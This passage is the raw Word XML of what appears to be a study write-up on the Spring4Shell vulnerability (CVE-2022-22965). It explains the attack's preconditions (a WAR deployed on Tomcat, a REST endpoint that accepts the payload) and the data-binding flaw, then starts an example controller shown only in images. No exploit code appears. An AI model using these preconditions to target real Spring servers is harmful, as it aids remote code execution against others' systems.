      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Target needs to package a war file deployed to a tomcat web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1BA51" w14:textId="4DC2EDB1" w:rsidR="00941359" w:rsidRDefault="00941359" w:rsidP="00941359">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Packaging a Spring Framework application with the web MVC component as a WAR file and deploying it to a tomcat server is a common deployment option, </w:t>
      </w:r>
      <w:r w:rsidRPr="00941359">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>because it provides a convenient way to distribute and run the application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00941359">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">By deploying a WAR file to Tomcat, the application can take advantage of the benefits of the Tomcat web server, such as load balancing, session management, </w:t>
      </w:r>
      <w:r w:rsidRPr="00941359">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and security features. Additionally, deploying a WAR file makes it easy to distribute the application to multiple servers, as the same WAR file can be deployed to multiple Tomcat instances with little or no modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB01BBD" w14:textId="4A257970" w:rsidR="00941359" w:rsidRDefault="00941359" w:rsidP="00941359">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Target need to have a rest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to take the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589F827" w14:textId="77777777" w:rsidR="00BC2085" w:rsidRDefault="00941359" w:rsidP="00941359">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941359">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">using a REST API alongside a Spring Framework Web MVC application can provide a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F8302E" w14:textId="5E6549E9" w:rsidR="00BC2085" w:rsidRDefault="00941359" w:rsidP="00BC2085">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941359">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>way to expose functionalities</w:t>
      </w:r>
      <w:r w:rsidR="00BC2085">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BC2085" w:rsidRPr="00BC2085">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>a mobile application may need to access certain functionalities of the web application, and a REST API can provide a way for the mobile app to communicate with the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE03FF" w14:textId="07A87C98" w:rsidR="00BC2085" w:rsidRDefault="00941359" w:rsidP="00BC2085">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941359">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>integrate with external systems</w:t>
      </w:r>
      <w:r w:rsidR="00BC2085">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BC2085" w:rsidRPr="00BC2085">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>the web application may need to communicate with a payment gateway or an external messaging service, and a REST API can provide a standardized way for the web application to interact with these external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C0838C" w14:textId="77777777" w:rsidR="00BC2085" w:rsidRDefault="00BC2085" w:rsidP="00BC2085">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="3600"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B591FB0" w14:textId="0C4D77ED" w:rsidR="00BC2085" w:rsidRDefault="00941359" w:rsidP="00BC2085">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941359">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>provide a more lightweight approach to data exposure</w:t>
      </w:r>
      <w:r w:rsidR="00BC2085">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00941359">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2085" w:rsidRPr="00BC2085">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>With a REST API, the data can be exposed in a format that can be easily consumed by other applications, such as JSON or XML, making it easier for external clients to work with the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447BBA39" w14:textId="77777777" w:rsidR="00BC2085" w:rsidRPr="00BC2085" w:rsidRDefault="00BC2085" w:rsidP="00BC2085">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FE652A" w14:textId="77777777" w:rsidR="00BC2085" w:rsidRDefault="00BC2085" w:rsidP="00BC2085">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="3600"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677C6DA9" w14:textId="667A3800" w:rsidR="00537109" w:rsidRDefault="00941359" w:rsidP="00537109">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941359">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>and improve the scalability of the application</w:t>
      </w:r>
      <w:r w:rsidR="00BC2085">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BC2085" w:rsidRPr="00BC2085">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>a REST API can provide a way to scale the web application by allowing certain functionalities to be offloaded to a separate service or server, without the need to rewrite the entire application. This can help to reduce the load on the main server and improve the overall performance and scalability of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C344CB" w14:textId="1F46618E" w:rsidR="00537109" w:rsidRDefault="00537109" w:rsidP="00537109">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A193849" w14:textId="789518DE" w:rsidR="00537109" w:rsidRDefault="00537109" w:rsidP="00537109">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>What is the vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE7FBE1" w14:textId="3B613AAD" w:rsidR="00537109" w:rsidRDefault="00537109" w:rsidP="00537109">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537109">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2022-22965 (Spring4Shell, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00537109">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SpringShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00537109">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a vulnerability in the Spring Framework that uses data binding functionality to bind data stored within an HTTP request to certain objects used by an application. The bug exists in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00537109">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>getCachedIntrospectionResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00537109">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> method, which can be used to gain unauthorized access to such objects by passing their class names via an HTTP request. It creates the risks of data leakage and remote code execution when special object classes are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14C236" w14:textId="3C3E2000" w:rsidR="00537109" w:rsidRDefault="00537109" w:rsidP="00537109">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537109">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>data binding is the process of converting user input data (such as form data) into Java objects and vice versa. It allows developers to map incoming request data to objects in their application's model and validate that data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E7498" w14:textId="60ABC7D4" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391DFD56" w14:textId="4E8CA69B" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E06466" w14:textId="2F785999" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3712136E" w14:textId="4B803C6D" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119AF6CB" w14:textId="77777777" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1757ADB5" w14:textId="0DF67C9C" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="00537109">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Example use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>getCachedIntrospectionResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44173859" w14:textId="63207DD8" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7088B8AF" w14:textId="4F046617" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006838A8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>For example, there is a simple classical application scenario in which the developer creates a trade object to capture request parameters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6AD85" w14:textId="350AE046" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22EB4BF6" wp14:editId="497EAAD2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>365760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3345180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="13" name="Afbeelding 13" descr="For example, there is a simple classical application scenario in which the developer creates a trade object to capture request parameters as show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 example, there is a simple classical application scenario in which the developer creates a trade object to capture request parameters as shown he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45180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F7DE4" w14:textId="2B6B420B" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA2373A" w14:textId="77777777" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E44866" w14:textId="42333DF9" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661187C2" w14:textId="7D4AA6DB" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F02010" w14:textId="63D55F93" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC07388" w14:textId="711CD5CF" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A43693F" w14:textId="07298A41" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA99689" w14:textId="0800E515" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25610BE8" w14:textId="17127C61" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B3A5873" w14:textId="48600AFE" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27929C99" w14:textId="3E8E69C1" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787BF896" w14:textId="46FC8CC6" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B1728D" w14:textId="6F847744" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E0690F" w14:textId="072B39F2" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205AB60F" w14:textId="53071951" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52631749" w14:textId="3E8123B6" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B43CEF0" w14:textId="7366B483" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4627F203" w14:textId="057C30A4" w:rsidR="006838A8" w:rsidRDefault="006838A8" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0862A500" w14:textId="6ED2B5E3" w:rsidR="006838A8" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6422C2B0" wp14:editId="040A9F20">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>166370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3307080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="14" name="Afbeelding 14" descr="The developer creates a controller to use the object trade as show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developer creates a controller to use the object trade as show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anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Then the developer creates a controller to use the object trade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA5105E" w14:textId="2498A813" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7495E1" w14:textId="7F654C44" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2BC8EF" w14:textId="66C858F5" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F098AA4" w14:textId="1C18950A" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761A63D7" w14:textId="6D752CAF" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43401FE6" w14:textId="0E148ACE" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="451DC8EB" w14:textId="22B1AF2C" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1599EF9F" w14:textId="4D8A68EC" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E80E7C" w14:textId="4E808256" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33150E89" w14:textId="49DB69D2" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01778525" w14:textId="613B8679" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A2CC57" w14:textId="5785F8A0" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499FF5DB" w14:textId="18A7A356" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7231C65F" w14:textId="7A942A30" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2123610F" w14:textId="654F4C65" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E32B7A1" w14:textId="6ABB5568" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
